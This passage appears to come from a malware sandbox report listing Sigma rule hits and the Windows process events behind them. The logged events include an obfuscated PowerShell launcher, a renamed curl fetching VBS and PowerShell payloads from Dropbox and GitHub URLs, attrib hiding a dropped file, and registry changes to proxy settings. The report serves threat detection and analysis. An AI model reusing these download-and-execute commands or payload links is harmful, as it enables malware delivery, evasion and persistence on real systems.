"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1429a6819ff25aad68fb09601fb0b63c4be24919adfd25c4ad925ef8d47d8f22",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "WmiPrvSE Spawned A Process",
"rule_description": "Detects WmiPrvSE spawning a process",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5c3ea6806114163b8cdf5735aeb07e702ab63e0e486f721df84cf675e2b0a04b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Hiding Files with Attrib.exe",
"rule_description": "Detects usage of attrib.exe to hide files from users.",
"rule_author": "Sami Ruohonen",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "ATTRIB.EXE",
"Hashes": "SHA1=F3E373EEAE9E9ABA16CFB2926937787CEAB929B7,MD5=41C498440D69D618E095D5A7B93B38B1,SHA256=C4BF774CCE635357B356E2D8D9ADB6018ED59F39F9CC8AE7C68079DD780F9A5B,IMPHASH=F0A82FEBA5B0EF2BE614622AE3E32C1C",
"Description": "Attribute Utility",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "attrib +h taskschd.vbs ",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\attrib.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "77ecce5ea77940e3b7b82f2766d696c4bf16f75a458c3ddfe650f26d4475fa74",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Insecure Transfer Via Curl.EXE",
"rule_description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&st=ip1rnvm2&dl=0\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232st=kn296823dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "884b7e21f67a56fc9cb312bdbc27e658c101c449662b2f9e25fd463a75715971",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Registry Tampering by Potentially Suspicious Processes",
"rule_description": "Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"EventID": "13",
"Details": "DWORD (0x00000001)",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass"
}
},
{
"values": {
"EventType": "SetValue",
"Details": "DWORD (0x00000001)",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
}
},
{
"values": {
"EventID": "13",
"EventType": "SetValue",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"Details": "DWORD (0x00000001)",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet"
}
},
{
"values": {
"EventType": "SetValue",
"Details": "DWORD (0x00000000)",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"EventID": "13",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
}
},
{
"values": {
"Details": "(Empty)",
"EventID": "13",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "c50af4c9fd0606d73bbfb8615f9f4e6ead04b5e20ce70f292af065c18f9e63c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Usage of For Loop with Recursive Directory Search in CMD",
"rule_description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.\n",
"rule_author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "MODE.COM",
"Hashes": "SHA1=DE63D30C05C72D1DE50C3337624A330E71C2D240,MD5=B0C969B4E1936433EEEAF8E7455DD9F6,SHA256=4702DA704C8EB0EF7A9EA2901B52D3444D8613677643E16932B266E34AD7830C,IMPHASH=CDF5181B2C7C446CFB494CA9F7058BBE",
"Description": "DOS Device MODE Utility",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "mode 15,1",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\mode.com",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=E563BAE25E3C011A1E69B4636C9B29B5661C460A,MD5=89B5A70BF37A93015F4845BF901B7825,SHA256=678652BB50ABB92DE91A69C05EA018C160FB4BE0902ACE14B15749246788CB40,IMPHASH=FD97AFEC4DC549DCD1FE1DAD15035DF9",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&st=ip1rnvm2&dl=0\" ",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "ATTRIB.EXE",
"Hashes": "SHA1=F3E373EEAE9E9ABA16CFB2926937787CEAB929B7,MD5=41C498440D69D618E095D5A7B93B38B1,SHA256=C4BF774CCE635357B356E2D8D9ADB6018ED59F39F9CC8AE7C68079DD780F9A5B,IMPHASH=F0A82FEBA5B0EF2BE614622AE3E32C1C",
"Description": "Attribute Utility",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "attrib +h taskschd.vbs ",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\attrib.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "e90bd630609a035372a71ff4471ee3d2e99ffb6464b8370ef394ea1a4d2c36f9",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Renamed CURL.EXE Execution",
"rule_description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&st=ip1rnvm2&dl=0\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232st=kn296823dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
